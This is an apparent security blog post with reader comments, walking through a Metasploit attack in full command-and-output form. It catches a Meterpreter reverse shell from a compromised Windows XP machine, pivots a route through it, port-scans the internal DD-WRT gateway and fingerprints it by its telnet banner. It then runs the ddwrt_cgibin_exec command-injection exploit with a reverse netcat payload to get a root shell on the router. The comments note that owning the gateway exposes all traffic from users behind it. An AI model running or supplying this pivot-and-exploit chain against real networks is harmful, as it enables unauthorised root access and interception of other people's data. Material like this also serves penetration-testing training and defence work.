Using Metasploit DD-WRT Exploit Module Thru Pivot
Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it. In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:
msf > ifconfig eth0[*] exec: ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0e:7f:f9:12:62inet addr:192.168.1.158 Bcast:192.168.1.255 Mask:255.255.255.0inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:55461 errors:0 dropped:0 overruns:0 frame:0TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:58889891 (58.8 MB) TX bytes:3107063 (3.1 MB)Interrupt:20msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.158LHOST => 192.168.1.158msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z[*] Exploit running as background job.msf exploit(handler) >[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler[*] Starting the payload handler...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)msf exploit(handler) > session -i 1[-] Unknown command: session.msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer: AWINXP01OS : Windows XP (Build 2600, Service Pack 2).meterpreter > execute -H -f -c -i -f cmd.exeProcess 1708 created.Channel 1 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\administrator\Desktop>ipconfig
ipconfigWindows IP ConfigurationEthernet adapter Local Area Connection:Connection-specific DNS Suffix . :IP Address. . . . . . . . . . . . : 192.168.111.200Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.111.2C:\Documents and Settings\administrator\Desktop>exitmeterpreter >
Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:
meterpreter >Background session 1? [y/N]msf exploit(handler) >msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1msf exploit(handler) > route print
Active Routing Table====================Subnet Netmask Gateway------ ------- -------192.168.111.0 255.255.255.0 Session 1msf exploit(handler) >
Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:
msf exploit(handler) > use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) > infoName: TCP Port ScannerVersion: 6823License: Metasploit Framework License (BSD)Provided by:hdm <hdm@metasploit.com>kris katterjohn <katterjohn@gmail.com>Basic options:Name Current Setting Required Description---- --------------- -------- -----------PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threadsTIMEOUT 1000 yes The socket connect timeout in milliseconds
Description:Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443PORTS => 22,23,80,443msf auxiliary(tcp) > set RHOSTS 192.168.111.2RHOSTS => 192.168.111.2msf auxiliary(tcp) > run[*] TCP OPEN 192.168.111.2:22[*] TCP OPEN 192.168.111.2:23[*] TCP OPEN 192.168.111.2:80[*] Auxiliary module execution completed
msf exploit(handler) >
Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:
msf exploit(handler) > connect -c 1 192.168.111.2 23[*] Connected to 192.168.111.2:23DD-WRT v24 std (c) 2007 NewMedia-NET GmbHRelease: 01/26/07 (SVN revision: 5660M)�DD-WRTx86CI login: ^Cmsf exploit(handler) >msf exploit(handler) >
As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:
msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_execmsf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcatPAYLOAD => cmd/unix/reverse_netcatmsf exploit(ddwrt_cgibin_exec) > set LPORT 2222LPORT => 2222msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2RHOST => 192.168.111.2msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158LHOST => 192.168.1.158msf exploit(ddwrt_cgibin_exec) > exploit[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler[*] Sending GET request with encoded command line...[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)uname -aLinux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.
For more information on this vulnerability please check the following links:
http://www.securityfocus.com/bid/35742http://www.milw0rm.com/exploits/9209
Reader Comments (7)
Nice post, but I have a few questions.
By default, will these systems have port 23 open? Or was this set up by the user? I was under the impression this exploit had to have user interaction -- in which case it is fairly limited?
Also, I see what is being done here but I don't understand the significance. You have rooted the gateway, but what additional benefit does that give you? The only thing I can think of is you could open up a port and use a bind shell to access the target machine as opposed to a reverse shell.
Lets say you have 10 users behind that gateway, if I own the gateway, I own the data that traverses thru that gateway, the machine can have their firewall on, AV, HIPS or any other countermeasure but they have to transmit data to be useful in many cases so if I wound the medium thru which the data moves I gain access to what all of those protections where supposed to protect, the data.
I can't understand how an 192.168.1.100 host was deployed, in which fashion or so. Can you explain, please?
Thank you.
Thanks,